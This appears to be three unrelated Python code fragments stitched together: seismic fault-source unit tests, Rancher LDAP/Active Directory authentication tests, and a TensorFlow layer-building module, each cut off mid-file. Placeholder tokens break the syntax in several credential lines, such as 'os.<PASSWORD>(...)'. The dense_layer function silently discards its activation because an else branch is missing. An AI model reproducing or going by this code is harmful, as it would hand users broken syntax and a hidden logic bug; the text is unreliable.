# respectively
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=6.0, max_mag=7.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST5_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=1.0))
def test_Pago_VeianoMontaguto(self):
# regression test
fault_trace = Line([Point(15.2368, 41.1594), Point(15.1848, 41.1644),
Point(15.1327, 41.1694), Point(15.0807, 41.1745),
Point(15.0286, 41.1795), Point(14.9765, 41.1846),
Point(14.9245, 41.1896), Point(14.8724, 41.1946),
Point(14.8204, 41.1997)])
mfd = EvenlyDiscretizedMFD(min_mag=6.9, bin_width=0.2,
occurrence_rates=[1.0])
dip = 70.0
upper_seismogenic_depth = 11.0
lower_seismogenic_depth = 25.0
rake = -130
scalerel = WC1994()
rupture_mesh_spacing = 5
rupture_aspect_ratio = 1
tom = PoissonTOM(10)
fault = SimpleFaultSource(
'ITCS057', 'Pago Veiano-Montaguto', TRT.ACTIVE_SHALLOW_CRUST, mfd,
rupture_mesh_spacing, scalerel, rupture_aspect_ratio, tom,
upper_seismogenic_depth, lower_seismogenic_depth,
fault_trace, dip, rake
)
self.assertEqual(len(list(fault.iter_ruptures())), 1)
class SimpleFaultParametersChecksTestCase(_BaseFaultSourceTestCase):
def test_mesh_spacing_too_small(self):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=0.5, max_mag=1.5,
bin_width=1.0)
with self.assertRaises(ValueError) as ar:
self._make_source(mfd=mfd, aspect_ratio=1.0)
self.assertEqual(str(ar.exception),
'mesh spacing 1 is too high to represent '
'ruptures of magnitude 1.5')
def test_fault_trace_intersects_itself(self):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
bin_width=1.0)
fault_trace = Line([Point(0, 0), Point(0, 1),
Point(1, 1), Point(0, 0.5)])
with self.assertRaises(ValueError) as ar:
self._make_source(mfd=mfd, aspect_ratio=1, fault_trace=fault_trace)
self.assertEqual(str(ar.exception), 'fault trace intersects itself')
class HypoLocSlipRupture(unittest.TestCase):
def setUp(self):
# Set the source property
self.src_mfd = mfdeven.EvenlyDiscretizedMFD(7.5, 1., [1.])
self.src_msr = msr.BaseMSR
self.src_tom = tom.PoissonTOM(50)
self.sarea = WC1994()
self.upper_seismogenic_depth = 0.
self.lower_seismogenic_depth = 40.
self.dip = 90.
self.rake = 0.
self.mesh_spacing = 1.
self.fault_trace_start = Point(0.0, 0.0)
self.fault_trace_end = Point(1.0, 0.0)
self.fault_trace_nodes = [self.fault_trace_start, self.fault_trace_end]
# Set the fault trace
self.fault_trace = Line(self.fault_trace_nodes)
def test_hypoloc_vertical_rupture(self):
source_id = name = 'test-source'
trt = TRT.ACTIVE_SHALLOW_CRUST
hypo_list = numpy.array([[0.25, 0.25, 0.4], [0.75, 0.75, 0.6]])
slip_list = numpy.array([[90., 1.]])
src = SimpleFaultSource(source_id, name, trt,
self.src_mfd, self.mesh_spacing,
self.sarea, 1., self.src_tom,
self.upper_seismogenic_depth,
self.lower_seismogenic_depth,
self.fault_trace, self.dip,
self.rake, hypo_list, slip_list)
lon = [0.11691180881629422, 0.35972864251163345, 0.12590502487907043,
0.36872185857443507, 0.13489824094187208, 0.37771507463723675,
0.14389145700464828, 0.38670829070001295, 0.15288467306744993,
0.39570150676281457, 0.16187788913025158, 0.40469472282559077,
0.17087110519302778, 0.41368793888839245, 0.17986432125582943,
0.42268115495119407, 0.18885753731860563, 0.43167437101397027,
0.19785075338140728, 0.44066758707677195, 0.20684396944418348,
0.44966080313954815, 0.21583718550698514, 0.45865401920234977,
0.22483040156978679, 0.46764723526512603, 0.23382361763256301,
0.47664045132792765, 0.24281683369536466, 0.48563366739072933,
0.25181004975814086, 0.49462688345350553, 0.26080326582094249,
0.50362009951630715, 0.26979648188374417, 0.51261331557908341,
0.27878969794652037, 0.52160653164188497, 0.28778291400932199,
0.53059974770468665, 0.29677613007209824, 0.53959296376746291,
0.30576934613489987, 0.54858617983026448, 0.31476256219770149,
0.55757939589304073, 0.32375577826047774, 0.56657261195584241,
0.33274899432327937, 0.57556582801864398, 0.34174221038605557,
0.58455904408142023, 0.35073542644885725, 0.59355226014422191,
0.35972864251163345, 0.60254547620699805, 0.36872185857443507,
0.61153869226979973, 0.37771507463723675, 0.62053190833257599,
0.38670829070001295, 0.62952512439537756, 0.39570150676281457,
0.63851834045817923, 0.40469472282559077, 0.64751155652095549,
0.41368793888839245, 0.65650477258375706, 0.42268115495119407,
0.66549798864653331, 0.43167437101397027, 0.67449120470933499,
0.44066758707677195, 0.68348442077213656, 0.44966080313954815,
0.69247763683491281, 0.45865401920234977, 0.70147085289771449,
0.46764723526512603, 0.71046406896049064, 0.47664045132792765,
0.71945728502329231, 0.48563366739072933, 0.72845050108606846,
0.49462688345350553, 0.73744371714887014, 0.50362009951630715,
0.74643693321167182, 0.51261331557908341, 0.75543014927444796,
0.52160653164188497, 0.76442336533724964, 0.53059974770468665,
0.77341658140002589, 0.53959296376746291, 0.78240979746282757,
0.54858617983026448, 0.79140301352562914, 0.55757939589304073,
0.80039622958840539, 0.56657261195584241, 0.80938944565120707,
0.57556582801864398, 0.81838266171398322, 0.58455904408142023,
0.82737587777678498, 0.59355226014422191, 0.83636909383958657,
0.60254547620699805, 0.84536230990236272, 0.61153869226979973,
0.85435552596516445, 0.62053190833257599, 0.86334874202794054,
0.62952512439537756, 0.87234195809074222, 0.63851834045817923,
0.88133517415351847]
lat = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0]
dep = [10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0]
rate = [0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728,
0.0067796610169491532, 0.010169491525423728]
for rup, i in zip(src.iter_ruptures(), range(1000)):
self.assertAlmostEqual(
rup.hypocenter.longitude, lon[i], delta=0.01)
self.assertAlmostEqual(rup.hypocenter.latitude, lat[i], delta=0.01)
self.assertAlmostEqual(rup.hypocenter.depth, dep[i], delta=0.01)
self.assertAlmostEqual(rup.occurrence_rate, rate[i], delta=0.01)
def test_hypoloc_dip_rupture(self):
source_id = name = 'test-source'
trt = TRT.ACTIVE_SHALLOW_CRUST
dip = 30.
hypo_list = numpy.array([[0.25, 0.25, 0.4], [0.75, 0.75, 0.6]])
slip_list = numpy.array([[90., 1.]])
self.mesh_spacing = 5.
src = SimpleFaultSource(source_id, name, trt,
self.src_mfd, self.mesh_spacing, self.sarea,
1., self.src_tom, self.upper_seismogenic_depth,
self.lower_seismogenic_depth,
self.fault_trace, dip, self.rake, hypo_list,
slip_list)
lon = [0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, 0.5396, 0.3597, 0.5846,
0.4047, 0.6295, 0.4497, 0.6745, 0.4946, 0.7195, 0.5396,
0.7644, 0.5846, 0.8094, 0.6295, 0.8544, 0.6745, 0.8993,
0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, 0.5396, 0.3597, 0.5846,
0.4047, 0.6295, 0.4497, 0.6745, 0.4946, 0.7195, 0.5396,
0.7644, 0.5846, 0.8094, 0.6295, 0.8544, 0.6745, 0.8993,
0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, 0.5396, 0.3597, 0.5846,
0.4047, 0.6295, 0.4497, 0.6745, 0.4946, 0.7195, 0.5396,
0.7644, 0.5846, 0.8094, 0.6295, 0.8544, 0.6745, 0.8993,
0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, | |
<reponame>bmdepesa/validation-tests<gh_stars>0
from common_fixtures import * # NOQA
from requests.auth import AuthBase
import ast
if_test_ad = pytest.mark.skipif(not os.environ.get('API_AUTH_AD_SERVER'),
reason='API_AUTH_AD_SERVER is not set')
if_do_key = pytest.mark.skipif(
not os.environ.get('DIGITALOCEAN_KEY'),
reason="Digital Ocean key is not set")
if_ldap_port = pytest.mark.skipif(
os.environ.get('LDAP_PORT') != 'True',
reason="LDAP_PORT is not True")
ADMIN_AD_CLIENT = None
ADMIN_TOKEN = None
class AdAuth(AuthBase):
def __init__(self, jwt, prj_id=None):
# setup any auth-related data here
self.jwt = jwt
self.prj_id = prj_id
def __call__(self, r):
# modify and return the request
r.headers['Authorization'] = 'Bearer ' + self.jwt
if self.prj_id is not None:
r.headers['X-API-Project-Id'] = self.prj_id
return r
@pytest.fixture(scope='session', autouse=True)
def ad_client(admin_client):
key = admin_client.create_apiKey()
admin_client.wait_success(key)
ad_client = from_env(url=cattle_url(),
access_key=key.publicValue,
secret_key=key.secretValue)
global ADMIN_AD_CLIENT
ADMIN_AD_CLIENT = ad_client
def create_ad_client(username=None,
password=<PASSWORD>,
project_id=None):
client = from_env(url=cattle_url(),
access_key=ADMIN_AD_CLIENT._access_key,
secret_key=ADMIN_AD_CLIENT._secret_key)
client.delete_by_id = delete_by_id
assert client.valid()
jwt = get_authed_token(username=username, password=password)['jwt']
client._access_key = None
client._secret_key = None
client._auth = AdAuth(jwt, prj_id=project_id)
client.reload_schema()
assert client.valid()
identities = client.list_identity()
assert len(identities) > 0
return client
def get_authed_token(username=None, password=None):
token = requests.post(cattle_url() + '/token', {
'authProvider': "ldapconfig",
'code': username + ':' + password
})
assert token.ok
token = token.json()
assert token['type'] != 'error'
assert token['user'] == username
assert token['userIdentity']['login'] == username
return token
def delete_ldap_token(id, cookies):
response = requests.delete(cattle_url() + '/token/' + id, cookies=cookies)
assert response.status_code == 204
for c in response.cookies:
assert c.name != "token"
assert "token=;Path=/;Expires=Thu, 01 Jan 1970 00:00:00 GMT;" \
in response.headers['set-cookie']
def load_config(access_mode="unrestricted"):
if os.environ.get('API_AUTH_AD_TLS') == 'True':
tls = True
else:
tls = False
config = {
'server': os.environ.get('API_AUTH_AD_SERVER'),
'domain': os.environ.get('API_AUTH_AD_SEARCH_BASE'),
'loginDomain': os.environ.get('API_AUTH_AD_LOGIN_DOMAIN'),
'port': int(os.environ.get('API_AUTH_AD_PORT')),
'serviceAccountPassword': os.environ.get('API_AUTH_AD_'
'SERVICE_ACCOUNT_PASSWORD'),
'serviceAccountUsername': os.environ.get('API_AUTH_AD_'
'SERVICE_ACCOUNT_USERNAME'),
'groupNameField': os.environ.get('SCHEMA_AD_GROUP_NAME_FIELD'),
'groupObjectClass': os.environ.get('SCHEMA_AD_GROUP_OBJECT_CLASS'),
'groupSearchField': os.environ.get('SCHEMA_AD_GROUP_SEARCH_FIELD'),
'groupDNField': os.environ.get('SCHEMA_AD_GROUP_DN_FIELD'),
'tls': tls,
'groupMemberMappingAttribute': "memberUid",
'groupMemberUserAttribute': os.environ.get('SCHEMA_AD_GROUP_'
'MEMBER_USER_ATTRIBUTE'),
'groupSearchDomain': os.environ.get('API_AUTH_AD_GROUP_SEARCH_BASE'),
'userDisabledBitMask': int(os.environ.get('SCHEMA_AD_USER_DISABLED'
'_STATUS_BITMASK')),
'userEnabledAttribute': None,
'userLoginField': os.environ.get('SCHEMA_AD_USER_LOGIN_FIELD'),
'userNameField': os.environ.get('SCHEMA_AD_USER_NAME_FIELD'),
'userObjectClass': os.environ.get('SCHEMA_AD_USER_OBJECT_CLASS'),
'userSearchField': os.environ.get('SCHEMA_AD_USER_SEARCH_FIELD'),
'userMemberAttribute': "memberOf"
}
ldap_port = os.environ.get('LDAP_PORT')
if ldap_port == 'True':
data = {
"accessMode": access_mode,
"allowedIdentities": [],
"enabled": True,
"provider": "ldapconfig",
"ldapconfig": config,
"githubConfig": {},
"shibbolethConfig": {},
"type": "config"
}
else:
config['accessMode'] = access_mode
config['enabled'] = True
return config
return data
def load_test_api_config(auth_config):
ldap_main_user = os.environ.get('AD_MAIN_USER')
ldap_main_pass = os.environ.get('AD_MAIN_PASS')
config = {
"authConfig": auth_config,
"code": ldap_main_user + ":" + ldap_main_pass,
"type": "testAuthConfig"
}
return config
def idToMember(identity, role):
return {
'externalId': identity.externalId,
'externalIdType': identity.externalIdType,
'role': role
}
@pytest.fixture(scope='session', autouse=True)
def turn_on_off_ad_auth(admin_client, request):
ldap_main_user = os.environ.get('AD_MAIN_USER')
ldap_main_pass = os.<PASSWORD>('AD_MAIN_PASS')
# Disable AD Authentication
config = load_config()
config['enabled'] = False
ldap_port = os.environ.get('LDAP_PORT')
if ldap_port == 'True':
auth_url = cattle_url()[:-7] + 'v1-auth/config'
r = requests.post(auth_url, data=json.dumps(config))
assert r.ok
else:
admin_client.create_ldapconfig(config)
token = get_authed_token(username=ldap_main_user,
password=<PASSWORD>_main_pass)
user = token['userIdentity']
global ADMIN_TOKEN
ADMIN_TOKEN = token
# Enable AD Authentication
allowed_identities = []
allowed_identities.append(user)
config['enabled'] = True
config['allowedIdentities'] = allowed_identities
if ldap_port == 'True':
auth_url = cattle_url()[:-7] + 'v1-auth/config'
r = requests.post(auth_url, data=json.dumps(config))
assert r.ok
else:
admin_client.create_ldapconfig(config)
def fin():
config = load_config()
config['enabled'] = None
access_key = ADMIN_AD_CLIENT._access_key
secret_key = ADMIN_AD_CLIENT._secret_key
ldap_port = os.environ.get('LDAP_PORT')
if ldap_port == 'True':
auth_url = cattle_url()[:-7] + 'v1-auth/config'
r = requests.post(auth_url, data=json.dumps(config),
auth=(access_key, secret_key))
assert r.ok
else:
client = create_ad_client(username=ldap_main_user,
password=<PASSWORD>)
client.create_ldapconfig(config)
request.addfinalizer(fin)
def reconfigure_ad(admin_client, domain, groupSearchDomain):
# Use testlogin api
ldap_port = os.environ.get('LDAP_PORT')
if ldap_port == 'True':
auth_config = load_config()
auth_config['ldapconfig']['domain'] = domain
auth_config['ldapconfig']['groupSearchDomain'] = groupSearchDomain
test_config = load_test_api_config(auth_config)
access_key = ADMIN_AD_CLIENT._access_key
secret_key = ADMIN_AD_CLIENT._secret_key
auth_url = cattle_url()[:-7] + 'v1-auth/testlogin'
r = requests.post(auth_url, data=json.dumps(test_config),
auth=(access_key, secret_key))
assert r.ok
config = load_config()
config['ldapconfig']['domain'] = domain
config['ldapconfig']['groupSearchDomain'] = groupSearchDomain
auth_url = cattle_url()[:-7] + 'v1-auth/config'
r = requests.post(auth_url, data=json.dumps(config),
auth=(access_key, secret_key))
assert r.ok
return
config = load_config()
config['enabled'] = None
admin_client.create_ldapconfig(config)
user = ADMIN_TOKEN['userIdentity']
allowed_identities = []
allowed_identities.append(user)
config['enabled'] = True
config['allowedIdentities'] = allowed_identities
config['domain'] = domain
config['groupSearchDomain'] = groupSearchDomain
admin_client.create_ldapconfig(config)
return admin_client
# 1
@if_test_ad
def test_allow_any_ad_user(admin_client):
ldap_user2 = os.environ.get('AD_USER2')
ldap_pass2 = os.environ.get('AD_PASS2')
token = get_authed_token(username=ldap_user2,
password=<PASSWORD>)
cookies = dict(token=token['jwt'])
schemas = requests.get(cattle_url() + "schemas", cookies=cookies)
assert schemas.status_code == 200
@if_test_ad
def test_ad_delete_token_on_logout(admin_client):
ldap_user2 = os.environ.get('AD_USER2')
ldap_pass2 = os.environ.get('AD_PASS2')
token = get_authed_token(username=ldap_user2,
password=<PASSWORD>)
cookies = dict(token=token['jwt'])
identities = requests.get(cattle_url() + "identities", cookies=cookies)
assert identities.status_code == 200
delete_ldap_token("current", cookies)
identities = requests.get(cattle_url() + "identities", cookies=cookies)
assert identities.status_code == 401
# 4
@if_test_ad
def test_ad_user_with_new_env(admin_client):
ldap_user3 = os.environ.get('AD_USER3')
ldap_pass3 = os.environ.get('AD_PASS3')
# test creation of new env with new valid user
token = get_authed_token(username=ldap_user3,
password=<PASSWORD>)
cookies = dict(token=token['jwt'])
schemas = requests.get(cattle_url() + "schemas", cookies=cookies)
assert schemas.status_code == 200
u3_client = create_ad_client(username=ldap_user3,
password=<PASSWORD>)
projects = u3_client.list_project()
found = False
for p in projects:
if p['name'] == ldap_user3 + "-Default":
found = True
break
assert found
# 5
@if_test_ad
def test_ad_create_new_env(admin_client):
ldap_user3 = os.environ.get('AD_USER3')
ldap_pass3 = os.environ.get('AD_PASS3')
u3_client = create_ad_client(username=ldap_user3,
password=<PASSWORD>)
u3_identity = None
for obj in u3_client.list_identity():
if obj.externalIdType == 'ldap_user':
u3_identity = obj
break
# Creating a new project
project_name = random_str() + '-test_case5'
project = u3_client.create_project(name=project_name, members=[
idToMember(u3_identity, 'owner')
])
u3_client.wait_success(project)
assert u3_client.by_id('project', project.id) is not None
projects = u3_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert len(p.members) == 1
assert p['members'][0]['role'] == 'owner'
break
assert found
# 6
@if_test_ad
def test_ad_create_new_env_add_member(admin_client):
ldap_user2 = os.environ.get('AD_USER2')
ldap_pass2 = os.environ.get('AD_PASS2')
ldap_user3 = os.environ.get('AD_USER3')
ldap_pass3 = os.environ.get('AD_PASS3')
u2_client = create_ad_client(username=ldap_user2,
password=<PASSWORD>)
u2_identity = None
for obj in u2_client.list_identity():
if obj.externalIdType == 'ldap_user':
u2_identity = obj
break
u3_client = create_ad_client(username=ldap_user3,
password=<PASSWORD>)
u3_identity = None
for obj in u3_client.list_identity():
if obj.externalIdType == 'ldap_user':
u3_identity = obj
break
# Creating a new project
project_name = random_str() + '-test_case6'
project = u2_client.create_project(name=project_name, members=[
idToMember(u2_identity, 'owner')
])
u2_client.wait_success(project)
assert u2_client.by_id('project', project.id) is not None
projects = u2_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert len(p.members) == 1
assert p['members'][0]['role'] == 'owner'
break
assert found
# Add new member as member
new_members = [
idToMember(u2_identity, 'owner'),
idToMember(u3_identity, 'member')
]
project = u2_client.by_id('project', project.id)
project.setmembers(members=new_members)
assert u2_client.by_id('project', project.id) is not None
assert u3_client.by_id('project', project.id) is not None
projects = u3_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert found
# Make sure the new user has no privileges
project = u3_client.by_id('project', project.id)
with pytest.raises(AttributeError) as excinfo:
project.setmembers(members=new_members)
assert "object has no attribute" in str(excinfo.value)
# 7
@if_test_ad
def test_ad_create_new_env_add_owner(admin_client):
ldap_user2 = os.environ.get('AD_USER2')
ldap_pass2 = os.environ.get('AD_PASS2')
ldap_user3 = os.environ.get('AD_USER3')
ldap_pass3 = os.environ.get('AD_PASS3')
ldap_user4 = os.environ.get('AD_USER4')
ldap_pass4 = os.environ.get('AD_PASS4')
u2_client = create_ad_client(username=ldap_user2,
password=<PASSWORD>)
u2_identity = None
for obj in u2_client.list_identity():
if obj.externalIdType == 'ldap_user':
u2_identity = obj
break
u3_client = create_ad_client(username=ldap_user3,
password=<PASSWORD>)
u3_identity = None
for obj in u3_client.list_identity():
if obj.externalIdType == 'ldap_user':
u3_identity = obj
break
u4_client = create_ad_client(username=ldap_user4,
password=<PASSWORD>)
u4_identity = None
for obj in u4_client.list_identity():
if obj.externalIdType == 'ldap_user':
u4_identity = obj
break
# Creating a new project
project_name = random_str() + '-test_case7'
project = u2_client.create_project(name=project_name, members=[
idToMember(u2_identity, 'owner')
])
u2_client.wait_success(project)
assert u2_client.by_id('project', project.id) is not None
projects = u2_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert len(p.members) == 1
assert p['members'][0]['role'] == 'owner'
break
assert found
# Add new member as member
new_members = [
idToMember(u2_identity, 'owner'),
idToMember(u3_identity, 'owner')
]
project = u2_client.by_id('project', project.id)
project.setmembers(members=new_members)
assert u2_client.by_id('project', project.id) is not None
assert u3_client.by_id('project', project.id) is not None
projects = u3_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert found
# Make sure the new user has privileges to add new members
new_members = [
idToMember(u2_identity, 'owner'),
idToMember(u3_identity, 'owner'),
idToMember(u4_identity, 'member')
]
same_project = u3_client.by_id('project', project.id)
same_project.setmembers(members=new_members)
projects = u4_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert found
# 8
@if_test_ad
def test_ad_create_new_env_add_group_member(admin_client):
ldap_main_user = os.environ.get('AD_MAIN_USER')
ldap_main_pass = os.environ.get('AD_MAIN_PASS')
ldap_user2 = os.environ.get('AD_USER2')
ldap_pass2 = os.environ.get('AD_PASS2')
group = os.environ.get('AD_GROUP')
main_client = create_ad_client(username=ldap_main_user,
password=<PASSWORD>)
main_identity = None
for obj in main_client.list_identity():
if obj.externalIdType == 'ldap_user':
main_identity = obj
break
# Creating a new project
project_name = random_str() + '-test_case8'
project = main_client.create_project(name=project_name, members=[
idToMember(main_identity, 'owner')
])
main_client.wait_success(project)
assert main_client.by_id('project', project.id) is not None
# Add new group as member
group_identity = main_client.list_identity(name=group)[0]
new_members = [
idToMember(main_identity, 'owner'),
idToMember(group_identity, 'member')
]
project = main_client.by_id('project', project.id)
project.setmembers(members=new_members)
u2_client = create_ad_client(username=ldap_user2,
password=<PASSWORD>)
projects = u2_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert found
project = u2_client.by_id('project', project.id)
with pytest.raises(AttributeError) as excinfo:
project.setmembers(members=new_members)
assert "object | |
"""Building blocks for various Neural Network architectures.
Author: <NAME>
Contact: <EMAIL>
Date: May 2018
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import itertools
import numpy as np
import tensorflow as tf
from . import _globals
from . import utils
# ==============================================================================
# FEEDFORWARD BLOCKS
# ------------------------------------------------------------------------------
def dense_layer(
x_input,
n_units,
activation=None,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
name=None):
# Get number of input features, and create layer kernel and bias variables
n_inputs = int(x_input.get_shape()[1])
kernel = tf.get_variable(
name='kernel', shape=(n_inputs, n_units), dtype=_globals.TF_FLOAT,
initializer=kernel_initializer, regularizer=kernel_regularizer)
bias = tf.get_variable(
name='bias', shape=(n_units), dtype=_globals.TF_FLOAT,
initializer=bias_initializer, regularizer=bias_regularizer)
# Return a tensor that computes linear/activated weighted input plus bias term
x_linear = tf.matmul(x_input, kernel) + bias
if activation is not None:
x_out = activation(x_linear)
x_out = x_linear
return x_out if name is None else tf.identity(x_out, name=name)
def hidden_layers(
x_input,
n_layer_units,
activation=None,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
keep_prob=None,
batch_norm=None,
bn_option_dict=None,
training=False,
layer_var_scope_prefix='hidden'):
"""
TODO(rpeloff) batch norm one of [None, 'before', 'after']
TODO(rpeloff) for batch_norm='after', see: https://github.com/ducha-aiki/caffenet-benchmark/blob/master/batchnorm.md
"""
# Check if list of activations specified for each layer, else duplicate activation for layers
layers = n_layer_units
n_layers = np.shape(n_layer_units)[0]
if utils.is_list_like(activation):
n_activations = np.shape(activation)[0]
if n_activations != n_layers:
raise ValueError(
"List of activations does not match number of hidden layers. "
"Got {} activations, expected {}.".format(n_activations, n_layers))
layers = zip(layers, activation)
else:
layers = itertools.zip_longest(layers, [], fillvalue=activation)
# Check batch norm type is valid
batch_norm_types = [None, 'before', 'after']
if batch_norm not in batch_norm_types:
raise ValueError(
"Invalid batch norm type: {}. "
"Expected one of: {}.".format(batch_norm, batch_norm_types))
# Sequentially build each hidden layer upon the previous layer (initially the flattened input layer)
x_out = tf.layers.flatten(x_input)
for index, layer in enumerate(layers):
n_units, activation_func = layer
with tf.variable_scope('{}{}'.format(layer_var_scope_prefix, index)):
# Create linear layer (activation postponed till after potential batch norm)
x_out = dense_layer(x_input=x_out,
n_units=n_units,
activation=None,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
name='dense')
# Batch norm before activation/non-linearity
if batch_norm == 'before':
x_out = tf.layers.batch_normalization(inputs=x_out,
training=training,
name='batch_norm',
**(bn_option_dict or {}))
# Postponed activation/non-linearity
x_out = tf.identity(activation_func(x_out), name='activation')
# Batch norm after activation/non-linearity
if batch_norm == 'after':
x_out = tf.layers.batch_normalization(inputs=x_out,
training=training,
name='batch_norm',
**(bn_option_dict or {}))
# Dropout layer if specified
if keep_prob is not None:
x_out = dropout_layer(x_input=x_out,
keep_prob=keep_prob,
training=training,
name='dropout')
return x_out
# ==============================================================================
# CONVOLUTIONAL BLOCKS
# ------------------------------------------------------------------------------
def conv2d_layer(
x_input,
n_filters,
kernel_size, # kernel_shape=(3,3) same as kernel_shape=3
strides=(1, 1), # same as strides=1
padding='valid',
activation=None,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
name=None):
"""
TODO(rpeloff) kernel size := (filter_height, filter_width) OR (kernel_size, kernel_size)
TODO(rpeloff) strides := (stride_height, stride_width) OR (strides, strides)
TODO(rpeloff) data format assumed to be "channels last" (i.e. [n_batch, height, width, in_channels])
"""
# Check the padding type is valid
padding = padding.upper()
padding_types = ['VALID', 'SAME']
if padding.upper() not in padding_types:
raise ValueError(
"Invalid padding type (case-insensitive): {}. "
"Expected one of: {}.".format(padding, padding_types))
# Get convolution window shape based on kernel_size and number of input and output channels/filters
